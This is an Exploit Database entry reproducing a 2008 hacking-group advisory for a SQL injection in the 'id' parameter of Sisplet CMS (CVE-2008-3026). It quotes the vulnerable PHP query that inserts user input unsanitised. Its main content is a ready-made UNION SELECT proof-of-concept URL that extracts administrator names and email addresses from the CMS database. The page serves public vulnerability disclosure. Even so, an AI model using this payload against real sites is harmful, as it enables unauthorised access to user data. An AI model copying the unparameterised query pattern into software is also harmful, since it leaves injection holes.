Exploit Database - Logo

Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection

EDB-ID: 5984 Author: CWH Underground Published: 2008-07-01
CVE: CVE-2008-3026 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
=================================================================
  Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
=================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Sisplet CMS
 VERSION     : 2008-01-24
 VENDOR      : http://cms.sisplet.org/
 DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (function.php)
-----------------------------------

$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");


---------
 Exploit
---------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]


------
 POC
------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-07-01]

Related Exploits

Trying to match CVEs (1): CVE-2008-3026
Trying to match OSVDBs (1): 46878
Trying to match setup file: d0682c9ef9054a8ffd66c0bebee81578
Other Possible E-DB Search Terms: Sisplet CMS 2008-01-24,  Sisplet CMS
Date D V Title Author
2007-04-05Download Exploit Code Verified Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusionkezzap66345
2009-12-07Download Exploit Code Verified SiSplet CMS 2008-01-24 - Multiple Remote File Inclusioncr4wl3r
Menu